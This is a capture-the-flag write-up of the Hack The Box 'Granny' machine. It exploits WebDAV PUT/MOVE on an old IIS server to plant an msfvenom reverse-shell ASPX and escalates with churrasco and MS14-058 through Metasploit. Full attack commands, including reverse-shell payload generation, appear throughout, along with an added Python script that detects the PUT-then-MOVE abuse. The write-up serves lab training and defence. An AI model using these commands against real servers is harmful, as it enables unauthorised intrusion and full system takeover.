Hackthebox writeup for granny
Mind Opener
The HTTP protocol lets us use methods like GET, POST, PUT and DELETE to send or delete data, but are there any methods with which we can edit, copy or manage files on a remote server?
If such a protocol extension lets you copy or move files, can that functionality be abused to compromise the server?
As always, begin with an nmap scan.
From the nmap scan, three things are important:
1. Port 80 is open and running an outdated Microsoft IIS server.
2. WebDAV (an extension of the HTTP protocol) is enabled.
3. Multiple HTTP methods are allowed.
What is WebDAV?
WebDAV stands for "Web-based Distributed Authoring and Versioning". It is a set of extensions to the HTTP protocol that allows users to collaboratively edit and manage files on remote web servers.
Use the davtest scanner, which uploads test executable files to determine whether the service is exploitable:
davtest -url http://10.10.10.15
To analyze how WebDAV works, add a new proxy listener in Burp and redirect its traffic to the target:
curl localhost
davtest -url http://localhost
From Burp's HTTP history, grab a request that successfully uploaded a file and send it to Repeater.
From the Repeater tab, use PUT to create another HTML file.
The good news is:
- We can simply browse the upload directory (no dirbuster this time!).
- We are also permitted to upload a file.
Create a payload using msfvenom.
msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.14.20 LPORT=4455 -o shell.aspx
The bad news is that PUTting an .aspx file is forbidden.
From the nmap scan we know that the MOVE method is allowed. More about WebDAV features can be read here.
MOVE method syntax below,
MOVE /source HTTP/1.1
Destination: /destination
The Burp Suite method was described in the ippsec video (the best); however, as I read further (special thanks to the 0xdf articles), I came to know that it is possible to upload the shell using curl as well (with various different syntaxes too). I have learnt and tried both methods.
Shell upload using Burp Suite
Rename the msfvenom payload to testshell.html and upload it with the PUT method.
Then use the MOVE method to change the extension to .aspx.
Start a netcat listener and grab the shell:
curl http://10.10.10.15/shell.aspx
Shell upload using curl
Rename shell.aspx to shell.txt and upload it:
cp shell.aspx shell.txt
curl http://10.10.10.15 --upload-file shell.txt
Rename it back to .aspx with MOVE:
curl -X MOVE --header "Destination:http://10.10.10.15/aspshell.aspx" http://10.10.10.15/shell.txt
-X, --request <command>      Specify request command to use
-H, --header <header/@file>  Pass custom header(s) to server
Then grab the shell.
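The upload-then-rename sequence above (PUT a file under a harmless extension, then MOVE it to .aspx) is exactly what a defender should look for in WebDAV traffic. The following Python script is an added example, not part of the original writeup: it parses raw HTTP requests as captured at a reverse proxy or WAF and flags a MOVE whose Destination header changes the extension to one IIS would execute. The sample requests and the executable-extension list are constructed for the example.

```python
"""Flag WebDAV upload-then-rename abuse in captured HTTP requests (added example)."""
from urllib.parse import urlsplit

# Extensions IIS would hand to a script engine; constructed list, extend as needed.
EXEC_EXTENSIONS = {".aspx", ".asp", ".asmx", ".ashx", ".exe", ".dll"}


def _ext(path):
    """Lower-cased extension of the last path segment, or '' if there is none."""
    name = path.rsplit("/", 1)[-1]
    return name[name.rfind("."):].lower() if "." in name else ""


def parse_request(raw):
    """Return (method, path, headers) from a raw HTTP/1.1 request text."""
    head = raw.split("\r\n\r\n", 1)[0]          # drop the body, if any
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            key, value = line.split(":", 1)
            headers[key.strip().lower()] = value.strip()
    return method.upper(), urlsplit(target).path, headers


def find_webdav_abuse(requests):
    """Return (severity, reason) findings for a sequence of raw requests."""
    findings = []
    for raw in requests:
        method, path, headers = parse_request(raw)
        if method == "PUT":
            findings.append(("medium", f"PUT of {path}: WebDAV write access is enabled"))
        elif method == "MOVE":
            dest = urlsplit(headers.get("destination", "")).path
            src_ext, dst_ext = _ext(path), _ext(dest)
            if dst_ext in EXEC_EXTENSIONS and dst_ext != src_ext:
                findings.append(("high", f"MOVE {path} -> {dest}: renamed to executable {dst_ext}"))
            else:
                findings.append(("low", f"MOVE {path} -> {dest}"))
    return findings


# Constructed sample traffic mirroring the PUT .txt / MOVE to .aspx sequence.
SAMPLE = [
    "PUT /shell.txt HTTP/1.1\r\nHost: 10.10.10.15\r\nContent-Length: 3\r\n\r\nabc",
    "MOVE /shell.txt HTTP/1.1\r\nHost: 10.10.10.15\r\n"
    "Destination: http://10.10.10.15/aspshell.aspx\r\n\r\n",
]

if __name__ == "__main__":
    for severity, reason in find_webdav_abuse(SAMPLE):
        print(severity.upper(), reason)
```

The same check belongs in a request filter: on IIS the PUT and MOVE verbs can simply be disallowed for anonymous users, which removes both findings at the source.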
This machine shows access denied while trying to grab the user.txt flag, so we move on to privilege escalation.
Privilege Escalation
Clone Windows Exploit Suggester:
git clone https://github.com/GDSSecurity/Windows-Exploit-Suggester.git
Check its README file for usage and proceed:
./windows-exploit-suggester.py --update
An Excel (.xls) database file is created at this step.
Run the systeminfo command on the Granny machine, paste its output on the attacker machine and save it as systeminfo.txt.
I had to install a few xlrd packages; the commands are listed in the screenshot below. After installing the packages, run the exploit suggester:
./windows-exploit-suggester.py --database 2021-07-09-mssb.xls --systeminfo systeminfo.txt
Multiple exploits are suggested; since I had used MS15-051 on the Bastard machine, I did not try it here and went ahead with the churrasco exploit.
More about access tokens, ACLs and token hijacking at the links below:
https://docs.microsoft.com/en-us/windows/win32/secauthz/access-tokens?redirectedfrom=MSDN
https://dl.packetstormsecurity.net/papers/presentations/TokenKidnapping.pdf
Priv Esc in Action
Upload and rename the churrasco.exe file using the same methods that we used earlier:
curl -X MOVE --header "Destination:http://10.10.10.15/chr.exe" http://10.10.10.15/chr.txt
The file lands in the inetpub/wwwroot directory, where we do not have write permission, so create a temp directory and copy the exploit there.
chr.exe -d "cmd" executes the command, but it does not give us a stable system shell. So we create a reverse shell executable and use churrasco to execute it, which gets us an admin session.
Generate the reverse shell and copy it to Granny with the same methods discussed previously:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.20 LPORT=6677 -f exe -o revshell.exe
Copy revshell.exe to the Granny machine and run it through the churrasco.exe file that we copied earlier.
Grab the SYSTEM shell on the netcat listener and capture the flag.
Granny exploitation using Metasploit
Generate a payload with msfvenom:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.19 LPORT=5566 -f aspx > payload.aspx
Upload the payload to the server as before.
In msfconsole, start the exploit/multi/handler module:
use exploit/multi/handler
Tell the handler which payload to expect by configuring it with the same settings as the payload we generated:
set payload windows/meterpreter/reverse_tcp
Visit the file in a browser and it opens a Meterpreter session for us.
We cannot capture the user flag, as access is denied.
So we need to move to privilege escalation: background the session, use the exploit suggester module as below, set the session and run it.
Use MS14-058 and run it.
Grab the root flag.
Skills that I learnt from this machine
- List and understand the usage of HTTP methods
- Combine HTTP methods with curl / Burp Suite Repeater to PUT, MOVE and COPY data
- Use the WebDAV MOVE method to rename uploaded files into executables
- Practical hands-on experience with msfvenom and Meterpreter
- Use Windows Exploit Suggester and the churrasco exploit for privilege escalation